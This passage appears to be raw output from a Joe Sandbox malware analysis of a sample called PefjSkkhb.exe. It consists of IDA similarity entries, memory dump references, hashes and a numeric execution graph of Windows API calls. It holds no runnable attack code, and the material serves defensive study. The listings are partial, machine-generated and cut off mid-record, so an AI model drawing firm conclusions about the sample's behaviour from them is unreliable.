                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: e+000$gfff
                                                                                                                                                                                                                    • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                                                                                                                                                                    • API String ID: 3307058713-2268073309
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                    • API String ID: 3467290483-2160076837
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                                                                                    • API String ID: 2496851823-2422070025
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                                                    • API String ID: 3988819677-2584243854
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CreateMessageObjectSendStock
                                                                                                                                                                                                                    • String ID: $SysTabControl32
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                    • String ID: Combobox
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _handle_error
                                                                                                                                                                                                                    • String ID: "$pow
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                                                                                    • String ID: <local>
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                    • String ID: !$tan
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                    • String ID: !$sin
                                                                                                                                                                                                                    • API String ID: 3384550415-1565623160
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                    • String ID: !$cos
                                                                                                                                                                                                                    • API String ID: 3384550415-1949035351
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _handle_error
                                                                                                                                                                                                                    • String ID: "$exp
                                                                                                                                                                                                                    • API String ID: 1757819995-2878093337
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • try_get_function.LIBVCRUNTIME ref: 00007FF656CD75E9
                                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?,?,00007FF656CD7241,?,?,?,?,00007FF656CD660C,?,?,?,?,00007FF656CD4CD3), ref: 00007FF656CD7600
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Valuetry_get_function
                                                                                                                                                                                                                    • String ID: FlsSetValue
                                                                                                                                                                                                                    • API String ID: 738293619-3750699315
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF656CD5629
                                                                                                                                                                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF656CD563A
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD7018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656CD563F), ref: 00007FF656CD708D
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD7018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656CD563F), ref: 00007FF656CD70BF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                                                    • API String ID: 3561508498-410509341
                                                                                                                                                                                                                    • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                                                                                                                    • Instruction ID: 9e37db7c4945396c66165274d6fd713a6fba8767fcf536813a7a42bb859fb461
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FED05E62A189C691DF10EF04D8903A8B330FB90348FD84A32E24DD25B9EF3ED64AD340
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001C.00000002.2584550890.00007FFD32CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CB0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd32cb0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: d9dbd908a8a3976d458647e3adc5fe8eccc312f105d723d4e87e4335184dbce5
                                                                                                                                                                                                                    • Instruction ID: eb8e92681673c8067f1fa9894819f4bf627be004ded1661b91f939e3aa741999
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9dbd908a8a3976d458647e3adc5fe8eccc312f105d723d4e87e4335184dbce5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5614522F0EA8A0FFBA996680C712BD76C1EF95312B5805BED14DC31D3EDC8AC109341
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001C.00000002.2584550890.00007FFD32CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CB0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd32cb0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 451843b9f663c3897b05c12f8f10b4ea6cf56d77fcc5944e52186c183d4ea9d3
                                                                                                                                                                                                                    • Instruction ID: e9e4e41164bed11e0f5ab42f7c01ab13268a118e82c89fbb8e7640e5631630dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 451843b9f663c3897b05c12f8f10b4ea6cf56d77fcc5944e52186c183d4ea9d3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36413B12F4FA8B0FF7A996680CB527C66C1AF56352B5805BDD24DC31D3DDD8AC116301
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001C.00000002.2583277460.00007FFD32BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32BE0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd32be0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                    • Instruction ID: dc142f5f4a445b9149014b2a5e2ccee297e169cd20d643d6b4135da515b17e33
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F901A73020CB0C4FDB44EF0CE051AB5B3E0FB89360F10052DE58AC3651DA36E882CB42

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:3.9%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                    Total number of Limit Nodes:109
98332 370fe6 Mailbox 59 API calls 98332->98334 98333->98270 98334->98332 98335->98271 98337 36134b 98336->98337 98338 361981 59 API calls 98337->98338 98339 36135b GetFileAttributesW 98338->98339 98339->98277 98339->98280 98341 364312 CreateFileW 98340->98341 98342 3a06fc 98340->98342 98343 364334 98341->98343 98342->98343 98344 3a0702 CreateFileW 98342->98344 98343->98291 98344->98343 98345 3a0728 98344->98345 98372 36410a 98345->98372 98349 3a0549 98348->98349 98350 363c7c 98348->98350 98364 363d0b 98349->98364 98391 3641d6 98349->98391 98351 36410a 2 API calls 98350->98351 98350->98364 98352 363c9e 98351->98352 98382 36433f 98352->98382 98356 363cb5 98357 370fe6 Mailbox 59 API calls 98356->98357 98358 363cc0 98357->98358 98359 36433f 59 API calls 98358->98359 98360 363ccb 98359->98360 98385 364220 98360->98385 98363 36410a 2 API calls 98363->98364 98364->98293 98366 3638b5 98365->98366 98367 3638a8 98365->98367 98366->98290 98369 3b394d 98366->98369 98368 36410a 2 API calls 98367->98368 98368->98366 98397 3b384c 98369->98397 98371 3b3959 WriteFile 98371->98290 98379 364124 98372->98379 98373 3a06cc 98381 3642ae SetFilePointerEx 98373->98381 98374 3641ab SetFilePointerEx 98380 3642ae SetFilePointerEx 98374->98380 98377 3a06e6 98378 36417f 98378->98343 98379->98373 98379->98374 98379->98378 98380->98378 98381->98377 98383 370fe6 Mailbox 59 API calls 98382->98383 98384 363ca8 98383->98384 98384->98349 98384->98356 98386 364293 98385->98386 98389 36422e 98385->98389 98396 3642ae SetFilePointerEx 98386->98396 98388 363cf8 98388->98363 98389->98388 98390 364266 ReadFile 98389->98390 98390->98388 98390->98389 98392 36410a 2 API calls 98391->98392 98393 3641f7 98392->98393 98394 36410a 2 API calls 98393->98394 98395 36420b 98394->98395 98395->98364 98396->98389 98398 3b385e 98397->98398 98399 3b3853 98397->98399 98398->98371 98404 3642ae SetFilePointerEx 98399->98404 98401 3b38b8 SetFilePointerEx 98405 3642ae SetFilePointerEx 98401->98405 98403 3b38d7 98403->98371 
98404->98401 98405->98403 98406->98299 98408 370fe6 Mailbox 59 API calls 98407->98408 98409 3640e0 98408->98409 98410 361c7e 59 API calls 98409->98410 98411 3640ed 98410->98411 98411->97929 98413 364085 98412->98413 98414 36404e 98412->98414 98433 363f20 98413->98433 98416 370fe6 Mailbox 59 API calls 98414->98416 98417 364055 WideCharToMultiByte 98416->98417 98420 363f79 98417->98420 98419 364077 98419->97934 98421 363f87 98420->98421 98422 363fc5 98420->98422 98421->98422 98424 363f92 98421->98424 98444 3b36bf 59 API calls _memmove 98422->98444 98425 3a05fe 98424->98425 98426 363fa0 98424->98426 98427 361c7e 59 API calls 98425->98427 98440 363f3c 98426->98440 98429 3a0608 98427->98429 98431 370fe6 Mailbox 59 API calls 98429->98431 98430 363fa8 _memmove 98430->98419 98432 3a061a 98431->98432 98434 363f31 98433->98434 98435 3a05e0 98433->98435 98434->98419 98436 361c7e 59 API calls 98435->98436 98437 3a05ea 98436->98437 98438 370fe6 Mailbox 59 API calls 98437->98438 98439 3a05f6 98438->98439 98441 363f4e 98440->98441 98443 363f6c 98440->98443 98442 370fe6 Mailbox 59 API calls 98441->98442 98442->98443 98443->98430 98444->98430 98445->97958 98447 38dd2b 98446->98447 98448 354fa8 98446->98448 98449 38dd3c 98447->98449 98451 361821 59 API calls 98447->98451 98452 370fe6 Mailbox 59 API calls 98448->98452 98450 3619e1 59 API calls 98449->98450 98455 38dd46 98450->98455 98451->98449 98453 354fbb 98452->98453 98453->98455 98456 354fc6 98453->98456 98454 354fd4 98454->97963 98454->97965 98455->98454 98457 361207 59 API calls 98455->98457 98456->98454 98458 361a36 59 API calls 98456->98458 98457->98454 98458->98454 98460 363bf3 98459->98460 98461 363bce 98459->98461 98462 3619e1 59 API calls 98460->98462 98461->98460 98463 363bdd 98461->98463 98468 3b3751 98462->98468 98464 363b7b 98463->98464 98467 363bed 98463->98467 98469 3640cd 59 API calls 98464->98469 98465 3b3780 98465->97991 98471 3640cd 59 API calls 98467->98471 98468->98465 98517 3b36ed ReadFile SetFilePointerEx 
98468->98517 98518 36153b 59 API calls 2 library calls 98468->98518 98470 363b8d 98469->98470 98503 363b23 98470->98503 98474 3b3871 98471->98474 98476 363b23 61 API calls 98474->98476 98477 3b387f 98476->98477 98479 3b388f Mailbox 98477->98479 98519 3613f1 61 API calls Mailbox 98477->98519 98479->97991 98481 363bab Mailbox 98481->97991 98483 354f87 98482->98483 98485 354f48 98482->98485 98484 361c9c 59 API calls 98483->98484 98487 354f5b 98484->98487 98486 370fe6 Mailbox 59 API calls 98485->98486 98486->98487 98487->97994 98489 364220 2 API calls 98488->98489 98490 363eb2 98489->98490 98490->97987 98492 3b7c8a 98491->98492 98493 370fe6 Mailbox 59 API calls 98492->98493 98494 3b7c91 98493->98494 98495 3b7cbe 98494->98495 98496 3b7c9d 98494->98496 98498 370fe6 Mailbox 59 API calls 98495->98498 98497 370fe6 Mailbox 59 API calls 98496->98497 98499 3b7ca6 _memset 98497->98499 98498->98499 98499->97993 98500->97995 98501->97965 98502->97965 98504 363f20 59 API calls 98503->98504 98507 363b34 98504->98507 98505 363b65 98505->98481 98509 36124d MultiByteToWideChar 98505->98509 98506 364220 2 API calls 98506->98507 98507->98505 98507->98506 98520 36408f 98507->98520 98510 361273 98509->98510 98511 3612ba 98509->98511 98513 370fe6 Mailbox 59 API calls 98510->98513 98512 3619e1 59 API calls 98511->98512 98516 3612ac 98512->98516 98514 361288 MultiByteToWideChar 98513->98514 98534 361364 98514->98534 98516->98481 98517->98468 98518->98468 98519->98479 98521 3640a3 98520->98521 98522 3a0692 98520->98522 98529 363fce 98521->98529 98524 361c7e 59 API calls 98522->98524 98526 3a069d 98524->98526 98525 3640af 98525->98507 98527 370fe6 Mailbox 59 API calls 98526->98527 98528 3a06b2 _memmove 98527->98528 98530 363fe6 98529->98530 98533 363fdf _memmove 98529->98533 98531 3a0622 98530->98531 98532 370fe6 Mailbox 59 API calls 98530->98532 98532->98533 98533->98525 98535 3613e6 98534->98535 98536 361373 98534->98536 98537 361981 59 API calls 98535->98537 98536->98535 98538 36137f 
98536->98538 98543 361391 _memmove 98537->98543 98539 3613b7 98538->98539 98540 361389 98538->98540 98542 361c7e 59 API calls 98539->98542 98541 361b7c 59 API calls 98540->98541 98541->98543 98544 3613c1 98542->98544 98543->98516 98545 370fe6 Mailbox 59 API calls 98544->98545 98545->98543 98572 36162d 98546->98572 98548 36230d 98579 36343f 98548->98579 98551 362327 Mailbox 98551->98003 98553 39f885 98589 3b0065 91 API calls 4 library calls 98553->98589 98555 36343f 59 API calls 98565 362105 _memmove 98555->98565 98558 3619e1 59 API calls 98558->98565 98559 39f893 98560 36343f 59 API calls 98559->98560 98561 39f8a9 98560->98561 98561->98551 98562 39f754 98564 361c7e 59 API calls 98562->98564 98567 39f75f 98564->98567 98565->98548 98565->98553 98565->98555 98565->98558 98565->98562 98566 39f7b4 98565->98566 98568 361aa4 59 API calls 98565->98568 98571 3626b7 _memmove 98565->98571 98577 361e05 60 API calls 98565->98577 98578 3635b9 59 API calls Mailbox 98565->98578 98587 361d0b 60 API calls 98565->98587 98588 36153b 59 API calls 2 library calls 98565->98588 98566->98571 98570 370fe6 Mailbox 59 API calls 98567->98570 98569 3622de CharUpperBuffW 98568->98569 98569->98565 98570->98571 98571->98566 98590 3b0065 91 API calls 4 library calls 98571->98590 98573 370fe6 Mailbox 59 API calls 98572->98573 98574 361652 98573->98574 98575 370fe6 Mailbox 59 API calls 98574->98575 98576 361660 98575->98576 98576->98565 98577->98565 98578->98565 98580 363452 _memmove 98579->98580 98581 3634df 98579->98581 98582 370fe6 Mailbox 59 API calls 98580->98582 98583 370fe6 Mailbox 59 API calls 98581->98583 98585 363459 98582->98585 98583->98580 98584 363482 98584->98551 98585->98584 98586 370fe6 Mailbox 59 API calls 98585->98586 98586->98584 98587->98565 98588->98565 98589->98559 98590->98551 98601 3b4ce2 98591->98601 98593 3b4195 Process32NextW 98594 3b4244 CloseHandle 98593->98594 98596 3b418e Mailbox 98593->98596 98594->98012 98595 361207 59 API calls 98595->98596 98596->98593 98596->98594 
